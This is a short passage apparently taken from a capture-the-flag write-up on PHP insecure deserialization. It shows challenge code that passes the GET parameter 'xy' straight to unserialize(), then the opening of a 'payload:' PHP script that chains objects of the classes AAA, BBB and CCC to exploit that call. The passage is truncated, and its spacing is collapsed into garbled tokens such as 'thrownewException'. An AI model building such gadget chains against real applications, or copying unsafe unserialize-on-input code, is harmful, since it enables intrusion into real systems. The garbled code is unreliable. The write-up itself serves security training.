} }if(isset($_GET['xy'])) {$a=unserialize($_GET['xy']);thrownewException("noooooob!!!"); } payload: <?phpclassAAA {public$s;public$a; }classBBB {public$c;public$d; }classCCC {public$c; }$c=newCCC();$a=newAAA();$b=newBBB();$c->c =$a;$a->s =newBBB();$b-...